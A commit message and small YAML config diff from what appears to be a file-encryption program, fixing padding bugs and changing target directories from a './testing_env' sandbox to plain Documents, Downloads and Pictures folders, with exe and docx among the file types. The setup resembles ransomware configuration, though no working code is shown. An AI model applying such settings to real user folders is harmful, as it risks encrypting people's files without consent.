Fix: padding issues and also some other bugs
so there was a a few bad nasty bugs that caused padding issues. one was
reading a buffer for signature that was signature sized. if the file was
smaller, it had a bunch of nulls and caused issues. I also was saving
the wrong order for origSized writing after the padding happens,
obviously caused issues.

--- a/example_config.yml
+++ b/example_config.yml
@@ -3,9 +3,9 @@ public_key: "file_name" # file to store public key
 private_key: "file_name" # file to store private key
 aes_key: "file_name" # the AES key is encrypted using the private key
 directories:
-  - "./testing_env/Documents"
-  - "./testing_env/Downloads"
-  - "./testing_env/Pictures"
+  - Documents
+  - Downloads
+  - Pictures
 files:
   - exe
   - docx
